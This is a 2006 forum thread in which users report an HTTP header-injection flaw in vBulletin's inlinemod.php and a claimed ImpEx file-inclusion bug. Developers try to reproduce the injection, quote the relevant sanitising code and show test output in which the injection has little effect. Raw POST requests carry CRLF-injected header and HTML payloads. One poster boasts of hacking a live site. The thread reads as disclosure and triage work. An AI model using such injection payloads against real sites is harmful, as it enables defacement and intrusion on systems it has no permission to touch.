XXS attack.
Bug exists because of the insufficient the processing of
input information in parameter url of inlinemod.php

Example:
POST /vb354/inlinemod.php HTTP/1.0
Cookie: bbpassword=a5c3d9e61bcb8dea99105143c772bcd9; bbuserid=1
Content-Length: 93
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.com
Content-Type: application/x-www-form-urlencoded

do=clearthread&url=lala2%0d%0aContent-Length:%2033%0d%0a%0d%0a<html>Hacked!</html>%0d%0a%0d%0a

I didn't find anyway to fix it but i hacked one website that uses vBulletin 3.5.4 :D

PS You dont need to ban me i am doing this to help you guys :D

Can't confirm this in a 3.5.2 build.

This was posted in the bug tracker this morning and neither Mike nor myself can reproduce this.

Apache 2.0.x, Apache 1.3.x and IIS were tested with a mixture of PHP applications. The end result was either a HTTP redirect OR a 301 moved message from Apache.

I doubt you hacked a site this was on as it requires Mod privledges and somehow getting around the REFERRER checking and also hoping that the PHP version is < 4.4.2.

Feel free to post a site that this works on so I can check the PHP version and web server.

Oh the function is exec_header_redirect for anyone interested :)

header("Location: $url");
header('HTTP/1.1 301 Moved Permanently');

Should also be noted that $url goes through xss_clean in class_core.php

function xss_clean(&$var)
{
static
$preg_find = array('#javascript#i', '#vbscript#i'),
$preg_replace = array('java script', 'vb script');

$var = preg_replace($preg_find, $preg_replace, htmlspecialchars_uni($var));
return $var;
}

Just in case anyone wants to spend time reproducing it.

Check it out lol :D:D:D:D

This is exploit for ImpEx 1.74, php inckuding in impex

<zapped>

Uh oh... Upgrade time again?

ImpEx is not a core vBulletin module that is only used while an upgrade in progress.

Please stop posting "exploits" or you will be banned.

ImpEx is not a core vBulletin module that is only used while an upgrade in progress.

But still its bug, sometimes people forget to delete impex and here u go =)))

This was fixed in CVS 6 months ago by jerry during a random audit and has already been mentioned.

I see you stopped mentioning the first "exploit" you used.

http://devbox/vb35x/inlinemod.php

POST /vb35x/inlinemod.php HTTP/1.1
Host: devbox
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://devbox/vb35x/forumdisplay.php?f=2
Cookie: bbuserid=1; vbulletin_collapse=templateusage; bbpassword=bd68d82513d0161c47b96e7da8bba794; acpcollapseprefs=100; bblastvisit=1143550886; vbcodemode=0; bblastactivity=1145913653; collapseprefs=100,debug; bbsessionhash=62d3fe42f097068a4d1bf2320425bc62; bbforum_view=ce615f0959e7373227560a9fc0b96672a-1-%7Bi-2_i-1146618953_%7D; vbulletin_inlinethread=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
do=clearthread&url=lala2%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cfont%20color=red%3Ehe y%3C/font%3E%3C/html%3E

HTTP/1.x 301 Moved Permanently
Date: Wed, 03 May 2006 01:20:22 GMT
Server: Apache/2.0.54 (Unix) PHP/5.1.1 mod_perl/2.0.2 Perl/v5.8.3
X-Powered-By: PHP/5.1.1
Cache-Control: private
Pragma: private
Set-Cookie: vbulletin_inlinethread=deleted; expires=Tue, 03-May-2005 01:20:22 GMT; path=/
Location: http://devbox/vb35x/lala2
Content-Type: text/html
HTTP/1.1: 200 OK


Inject worked but the redirect still happened with no code execution.